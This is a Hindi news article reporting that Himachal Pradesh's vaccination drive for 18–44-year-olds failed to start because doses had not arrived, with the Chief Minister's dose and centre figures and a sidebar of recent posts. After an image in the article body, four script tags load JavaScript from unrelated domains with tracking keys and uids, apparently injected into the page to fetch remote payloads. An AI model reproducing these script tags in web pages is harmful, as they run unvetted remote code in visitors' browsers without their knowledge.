हिमाचल में आज से नहीं शुरू हो पाया 18 से 44 आयु वर्ग के लोगों के लिए वाली वैक्सीन लगाने का काम

<p>देशभर में आज से 18 आयुवर्ग से लेकर 44 साल के बीच के लोगों के लिए टीकाकरण अभियान शुरू होना था। लेकिन हिमाचल में ये टीकाकरण आज शुरू नहीं हो पाया। क्योंकि हिमाचल में इस टीकाकरण की डोज़ नहीं पहुंच पाई है। बाकी वैक्सीन की उपलब्धता पर निर्भर करेगा कि टीकाकरण किस तरह आगे बढ़ेगा। मुख्यमंत्री जयराम ठाकुर के मुताबिक़ हिमाचल में हर सप्ताह 5 लाख डोज़ की ज़रूरत होगी। यदि&nbsp; वैक्सीन मिलती है तो चरणबद्ध तरीके से टीकाकरण को आगे बढ़ाया जाएगा। सीरम को 73 लाख डोज़ का आर्डर हिमाचल की तरफ से दिया गया है। जिसको आने में अभी 3 से 4 हफ़्ते का समय लग सकता है।</p>

<p>मुख्यमंत्री जयराम ठाकुर ने बताया कि हिमाचल में 18 से 44 आयुवर्ग के लोगों के लिए ऑनलाइन पंजीकरण शुरू कर दिया है। वैक्सीन की उपलब्धता के आधार पर टीकाकरण केन्द्रों में लोगों को बुलाया जाएगा। सरकार ने टीकाकरण केंद्रों की संख्या जो वर्तमान में 500 है उसे 1 हजार करने के निर्देश जारी कर दिए हैं। मुख्यमंत्री ने बताया कि हिमाचल में 2.08 लाख डोज़ 45 वर्ष तक के लोगों के लिए उपलब्ध है। जबकि 1.5 लाख लाख ओर डोज़ पहुंच गई है। हिमाचल को लगभग 20 लाख डोज वैक्सीन हिमाचल प्रदेश को अभी तक मिली हैं। जिनमें से 17 लाख के करीब लोगों को वैक्सीन लगाई जा चुकी है। यानी कि हिमाचल में अभी तक 20 फ़ीसदी लोगों को ही वैक्सीन लग पाई है।</p>

<p>हिमाचल प्रदेश में अभी 45 साल से ऊपर तक के 14.77 लाख लोगों को टीका लग चुका है। जिनमें 2.37 लाख लोगों ने दूसरी डोज़ भी ले ली है। हिमाचल की आबादी 70 लाख से ज़्यादा है। जिसमें से 30 लाख में क़रीब 18 से 45&nbsp; आयु वर्ग के लोग हैं। जिनके लिए 60 लाख से ज़्यादा डोज़ चाहिए होंगी। इसके अलावा अभी 45 साल के ऊपर वाले लोगों को भी पहली और दूसरी डोज़ लगनी है। ऐसे में 73 लाख डोज़ की मांग सीरम इंस्टिट्यूट से की गई है। जिसको आने में 3 से 4 सप्ताह का समय लग सकता है।</p>

<p><img src=”/media/gallery/images/image(2770).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1619853437651″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हिमाचल में 2 दिन बाद एक्टिव होगा वेस्टर्न डिस्टरबेंस:9-10 अक्टूबर को बारिश; बढ़ेगी ठंड, अभी तापमान सामान्य से ज्यादा

Shimla: हिमाचल प्रदेश में दो दिन बाद पश्चिमी विक्षोभ (WD) एक्टिव हो रहा है। इससे…

57 mins ago

Himachal: हिमाचल प्रदेश के बिजली उपभोक्ताओं को सब्सिडी अब सीधे बैंक खाते में मिलेगी

Himachal power subsidy:  हिमाचल प्रदेश के बिजली उपभोक्ताओं को अब बिजली पर मिलने वाली सब्सिडी…

2 hours ago

Mandi News: नवरात्रों में माता बगलामुखी मंदिर में भक्तों का उमड़ा सैलाब, भक्तों की मनोकामनाएं हो रही हैं पूर्ण

Baglamukhi Temple  : सदर विधानसभा क्षेत्र के तुंगल में स्थित प्रसिद्ध देवी माता बगलामुखी मंदिर…

2 hours ago

Pakistan News: शादी की मनाही पर लड़की ने परिवार को दिया जहर, 13 की मौत

Pakistan family poisoned murder : पाकिस्तान के सिंध प्रांत में एक दिल दहला देने वाली…

2 hours ago

मुख्यमंत्री सुक्खू ने अचानक किया IGMC शिमला का निरीक्षण, मरीजों से लिया फीडबैक

CM Sukhu visits IGMC Shimla:  हिमाचल प्रदेश के मुख्यमंत्री सुखविंद्र सिंह सुक्खू सोमवार सुबह 7:00…

3 hours ago

नवाचार को बढ़ावा दे रहा एटीसी शाहपुर

नवीन तकनीक और प्रौद्योगिकी से आत्मनिर्भरता की ओर बढ़ रहे कदम Kangra:  उपयुक्त प्रौद्योगिकी केन्द्र…

20 hours ago